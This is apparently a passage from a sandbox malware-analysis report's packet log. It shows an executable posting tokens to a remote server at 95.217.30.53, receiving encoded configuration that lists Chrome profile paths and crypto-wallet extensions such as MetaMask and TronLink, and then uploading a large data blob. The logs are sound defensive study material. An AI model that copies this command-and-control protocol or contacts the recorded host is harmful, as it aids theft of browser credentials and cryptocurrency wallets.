name="hwid"C3C95522D9254071173853-a33c7340-61ca------f3ohlfuk6f3e3ectri5fContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------f3ohlfuk6f3e3ectri5f--
2025-03-15 07:29:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:19 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|607fd117ce5da7700afdfc7b092f7140\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49729	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:20 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5phv37gl6xlf3ekf3e37 Host: 95.217.30.53 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:20 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 70 68 76 33 37 67 6c 36 78 6c 66 33 65 6b 66 33 65 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 35 70 68 76 33 37 67 6c 36 78 6c 66 33 65 6b 66 33 65 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 35 70 68 76 33 37 67 6c 36 78 6c 66 33 65 6b 66 33 65 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------5phv37gl6xlf3ekf3e37Content-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------5phv37gl6xlf3ekf3e37Content-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------5phv37gl6xlf3ekf3e37Cont
2025-03-15 07:29:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:20 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49730	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:21 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----tr9r1d26x4wtje3ohv3w Host: 95.217.30.53 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:21 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 74 72 39 72 31 64 32 36 78 34 77 74 6a 65 33 6f 68 76 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 74 72 39 72 31 64 32 36 78 34 77 74 6a 65 33 6f 68 76 33 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 74 72 39 72 31 64 32 36 78 34 77 74 6a 65 33 6f 68 76 33 77 0d 0a 43 6f 6e 74 Data Ascii: ------tr9r1d26x4wtje3ohv3wContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------tr9r1d26x4wtje3ohv3wContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------tr9r1d26x4wtje3ohv3wCont
2025-03-15 07:29:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:22 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49732	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:22 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----iwtjmycbsr1vaa1ngvkn Host: 95.217.30.53 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:22 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 69 77 74 6a 6d 79 63 62 73 72 31 76 61 61 31 6e 67 76 6b 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 69 77 74 6a 6d 79 63 62 73 72 31 76 61 61 31 6e 67 76 6b 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 69 77 74 6a 6d 79 63 62 73 72 31 76 61 61 31 6e 67 76 6b 6e 0d 0a 43 6f 6e 74 Data Ascii: ------iwtjmycbsr1vaa1ngvknContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------iwtjmycbsr1vaa1ngvknContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------iwtjmycbsr1vaa1ngvknCont
2025-03-15 07:29:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:23 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49734	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:24 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ba1dj58glx4ozm7q900h Host: 95.217.30.53 Content-Length: 5517 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:24 UTC	5517	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 62 61 31 64 6a 35 38 67 6c 78 34 6f 7a 6d 37 71 39 30 30 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 62 61 31 64 6a 35 38 67 6c 78 34 6f 7a 6d 37 71 39 30 30 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 62 61 31 64 6a 35 38 67 6c 78 34 6f 7a 6d 37 71 39 30 30 68 0d 0a 43 6f 6e 74 Data Ascii: ------ba1dj58glx4ozm7q900hContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------ba1dj58glx4ozm7q900hContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------ba1dj58glx4ozm7q900hCont
2025-03-15 07:29:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:25 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49735	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:25 UTC	179	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----f3ohlfuk6f3e3ectri5f Host: 95.217.30.53 Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:25 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 66 33 6f 68 6c 66 75 6b 36 66 33 65 33 65 63 74 72 69 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 66 33 6f 68 6c 66 75 6b 36 66 33 65 33 65 63 74 72 69 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 66 33 6f 68 6c 66 75 6b 36 66 33 65 33 65 63 74 72 69 35 66 0d 0a 43 6f 6e 74 Data Ascii: ------f3ohlfuk6f3e3ectri5fContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------f3ohlfuk6f3e3ectri5fContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------f3ohlfuk6f3e3ectri5fCont
2025-03-15 07:29:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 15 Mar 2025 07:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-15 07:29:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49736	95.217.30.53	443	7628	C:\Users\user\Desktop\Cm2GRjWK1C.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-15 07:29:26 UTC	182	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----srq9hlxlfcbaiek6ppph Host: 95.217.30.53 Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 73 72 71 39 68 6c 78 6c 66 63 62 61 69 65 6b 36 70 70 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 30 37 66 64 31 31 37 63 65 35 64 61 37 37 30 30 61 66 64 66 63 37 62 30 39 32 66 37 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 73 72 71 39 68 6c 78 6c 66 63 62 61 69 65 6b 36 70 70 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 35 34 32 35 62 66 39 31 38 31 65 36 63 31 33 32 61 61 62 39 66 65 39 64 35 64 62 62 30 61 66 0d 0a 2d 2d 2d 2d 2d 2d 73 72 71 39 68 6c 78 6c 66 63 62 61 69 65 6b 36 70 70 70 68 0d 0a 43 6f 6e 74 Data Ascii: ------srq9hlxlfcbaiek6ppphContent-Disposition: form-data; name="token"607fd117ce5da7700afdfc7b092f7140------srq9hlxlfcbaiek6ppphContent-Disposition: form-data; name="build_id"95425bf9181e6c132aab9fe9d5dbb0af------srq9hlxlfcbaiek6ppphCont
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-03-15 07:29:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
